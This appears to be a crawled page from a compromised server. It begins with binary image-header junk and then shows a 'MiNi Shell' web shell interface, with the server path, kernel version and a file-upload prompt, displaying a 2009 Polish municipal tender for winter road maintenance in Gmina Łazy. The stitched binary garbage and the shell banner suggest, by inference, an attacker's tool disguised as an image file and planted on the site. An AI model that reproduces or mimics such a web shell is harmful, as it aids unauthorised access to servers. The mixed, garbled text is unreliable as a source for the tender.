JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090909/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090909/312132-N-2009.html

<p class="kh_header"><b>Łazy: Zimowe utrzymanie dróg gminnych na terenie Gminy Łazy  w okresie 
od 15 listopada 2009 r. do 31 marca 2010 r.</b><br>
<b>Numer ogłoszenia: 312132 - 2009; data zamieszczenia: 09.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łazach , ul. Traugutta 15, 42-450 Łazy, woj. śląskie, tel. 032 6729326.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.lazy.bip.jur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych na terenie Gminy Łazy  w okresie 
od 15 listopada 2009 r. do 31 marca 2010 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: prace obejmujące wykonanie zimowego utrzymania dróg na terenie Gminy Łazy.
Zakres prac :
a/ usuwanie śliskości zimowej przez posypywanie materiałami uszorstniającymi (żużel, piasek) i rozmrażającymi ( mieszanka solno - piaskowa, solno - żużlowa);
b/ odśnieżanie dróg;
c/ odśnieżanie i posypywanie chodników oraz schodów piaskiem;
d/ odśnieżanie i posypywanie zatok przystankowych i miejsc zatrzymywania się komunikacji miejskiej;

Zamawiający dopuszcza składanie ofert częściowych i częściowy wybór ofert, gdzie część stanowi jedna strefa. 

Podział Gminy Łazy na strefy -części
Strefa I miasto Łazy
drogi gminne - 36,85 km
Strefa II Rokitno Szlacheckie
drogi gminne - 17, 5 km
Strefa III Niegowonice, Niegowoniczki, Grabowa, Skałbania
drogi gminne - 41, 6 km 
Strefa IV Wysoka, Wiesiółka, Chruszczobród,
drogi gminne - 36, 5 km
Strefa V Ciągowice, Turza, Kuźnica Masłońska
drogi gminne - 11, 9 km.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda zabezpieczenia oferty wadium .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz złożą dokumenty potwierdzające spełnianie tych warunków, z zastrzeżeniem art. 26 ust.3 Pzp. W szczególności zamawiający wymaga, aby wykonawcy wykazali, że:

1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a zwłaszcza wykazali, że wykonali: 

a) w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -
w tym okresie, min. 1 zadania w zakresie zimowego utrzymania dróg;

3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy Pzp. 

2. Opis sposobu dokonywania oceny spełniania warunków udziału 
w postępowaniu: 
Zamawiający dokona oceny spełniania każdego z warunków na podstawie załączonych do oferty dokumentów, o których mowa w Rozdz. VIII SIWZ na zasadzie spełnia nie spełnia.
Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane przez zamawiającego, jako niespełnienie warunku, co będzie skutkować wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 Pzp. 
Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 
W przypadku, gdy Wykonawca złoży oferty częściowe na więcej niż jedną strefę zakres określony, jako minimalny przy strefach sumuje się.

2.1. Wykonawca winien oświadczyć, iż będzie dysponować odpowiednią ilością osób do realizacji niniejszego zamówienia, umożliwiającą obsługę maszyn wraz 
z osobą kierującą akcją.
Wykonawca ubiegający się o zamówienie winien spełnić następujące minimalne warunki na poszczególne części - strefy w km :
Strefa I miasto Łazy
Drogi gminne -  36,85 km

Strefa II Rokitno Szlacheckie
drogi gminne - 17,5 km

Strefa III Niegowonice, Niegowoniczki, Grabowa,  Skałbania
drogi gminne - 41,6 km 

Strefa IV Wysoka, Wiesiółka, Chruszczobród,
drogi gminne -  36,5 km

Strefa V Ciągowice, Turza, Kuźnica Masłońska
drogi gminne - 11,9 km

W przypadku, gdy Wykonawca złoży oferty częściowe na więcej niż jedną strefę zakres określony jako minimalny przy strefach sumuje się.

2.2. Wykonawca winien wykazać się dostępem do następującego sprzętu:
 min. (1) jednego pojazdu do patrolowania dróg niezależnie na jaką ilość stref składa ofertę.
Gdy zamierza składać ofertę 
a). dla części 1 - strefy I
- pługo - piaskarka na pojazdach samochodowych
-2 pługi wraz z ciągnikiem kołowym z napędem 4x4
- rozrzutnik do ciągnika 
- ładowarka
- samochód samowyładowczy
- odśnieżarka do chodników
- zabezpieczenie 10 pojemników na piasek
lub
- pług wraz z ciągnikiem kołowym o mocy nie mniejszej niż 80 KM
- 2 pługi wraz z ciągnikiem kołowym z napędem 4x4
- 2 rozrzutniki do ciągnika
- ładowarka
- samochód samowyładowczy
- odśnieżarka do chodników 
- zabezpieczenie 10 pojemników na piasek.

b) dla strefy III lub strefy IV 
- 1 pługo - piaskarka na pojazdach samochodowych,
- 1 pług wraz z ciągnikiem kołowym o mocy nie mniejszej niż 80 KM,
- 1 rozrzutnik do ciągnika,
lub
- 2 pługi wraz z ciągnikiem kołowym o mocy nie mniejszej niż 80 KM,
- 1 rozrzutnik do ciągnika,

c) dla strefy II i V
- 1 pług z ciągnikiem kołowym
- 1 rozrzutnik

W przypadku, gdy Wykonawca złoży oferty częściowe na większą ilość stref winien wykazać się dostępem do sumy sprzętu wymaganego dla poszczególnych stref.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdz. VIII SIWZ.
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki
Wykonawca spełnił.
Niespełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełniania warunków, o których mowa w rozdz. VII SIWZ oferta musi zawierać następujące dokumenty:

a) oświadczenie wykonawcy określające, że spełnia wymagania wynikające z art. 22 ust.1 ustawy - Prawo zamówień publicznych, w tym nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych /w załączeniu wzór formularza nr 2,

b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

c) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

d) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 punkty: 4, 5, 6, 7, 8 Prawa zamówień publicznych - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

e) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 punkt 9 Prawa zamówień publicznych - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
Nie dotyczy osób fizycznych oraz spółek cywilnych składających się z osób fizycznych;

f) W celu potwierdzenia opisanego przez Zamawiającego warunku szczególnego w zakresie posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia żąda przedłożenia:
- wykazu odpowiedniej ilości pracowników umożliwiających obsługę maszyn wraz z osobą kierującą akcją - odpowiednio dla każdej strefy. 
W przypadku, gdy Wykonawca złoży oferty częściowe na większą ilość stref, zakres określony, jako minimalny sumuje się.

g) wykaz wykonanych robót budowlanych w okresie trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
i wartością  przedmiotowi zamówienia, - dokumenty potwierdzające, że roboty, 
o których mowa powyżej, zostały wykonane należycie -referencje,

h) Wykaz sprzętu, którym dysponuje Wykonawca do prowadzenia zimowego utrzymania dróg- odpowiednio dla każdej strefy zgodnie z rozdz. VII ( warunki wymagane od wykonawców pkt. 2.2 niniejszej specyfikacji)

i) Wykaz podwykonawców, którzy będą wykonywali cześć usługi (załączyć, jeżeli
wykonawca zamierza wykonać przedmiot zamówienia przy pomocy podwykonawców).
Wykaz powinien zawierać:
a/ nazwę i adres podwykonawców,
b/ podanie zakresu prac (z procentowym udziałem, które dany podwykonawca będzie realizował).

 Wykonawca określi cenę w formularzu cenowym stanowiącym Załącznik nr 3
( odpowiednio do każdej z części zamówienia).
Wyżej wymienione dokumenty muszą być przedstawione w formie oryginału lub
Kserokopii, poświadczonej na każdej stronie za zgodność z oryginałem przez wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy.

Zamawiający może zażądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu, gdy przedstawiona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej wiarygodności.

2.Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy Pzp. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 r. Dz. U. Nr 87, poz. 605) uwzględniający zmiany wprowadzone rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 188, poz. 1155).

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. 
Pełnomocnictwo należy dołączyć do oferty w formie oryginału lub notarialnie potwierdzonej kopii. 

Zamawiający dopuszcza możliwość wspólnych oświadczeń wykonawców wspólnie ubiegających się o udzielenie zamówienia potwierdzających, że razem spełniają warunki, o których mowa w art. 22 ust. 1 pkt.1-3. W trakcie dokonywania oceny oferty konsorcjum Zamawiający uwzględni posiadaną wiedzę i doświadczenie, posiadane uprawnienia i sytuację ekonomiczną. 
Wszyscy partnerzy będą ponosić solidarną odpowiedzialność za wykonanie umowy zgodnie z jej postanowieniami.
W przypadku nie spełnienia tych wymagań oferta konsorcjum zostanie wykluczona.
Jeżeli oferta wykonawców wspólnie ubiegających się o wykonanie zamówienia zostanie wybrana, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.

3.Wykonawca może złożyć ofertę na jedną lub więcej części. Jeżeli wykonawca zamierza złożyć oferty na więcej części jest zobowiązany do złożenia odrębnych ofert na każdą część ( strefę) osobno wraz z załączeniem wszystkich dokumentów wymaganych w rozdz.VIII  niniejszej SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lazy.bip.jur.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łazach ul. Traugutta 15, 42-450 Łazy pokój 310.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2009 godzina 10:00, miejsce: Urząd Miejski w Łazach ul. Traugutta 15, 42-450 Łazy- sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Strefa I miasto Łazy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> drogi gminne - 36,85 km.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Strefa II Rokitno Szlacheckie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> drogi gminne - 17, 5 km.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Strefa III Niegowonice, Niegowoniczki, Grabowa, Skałbania.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> drogi gminne - 41, 6 km.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Strefa IV Wysoka, Wiesiółka, Chruszczobród,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> drogi gminne - 36, 5 km.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Strefa V Ciągowice, Turza, Kuźnica Masłońska.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> drogi gminne - 11, 9 km.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com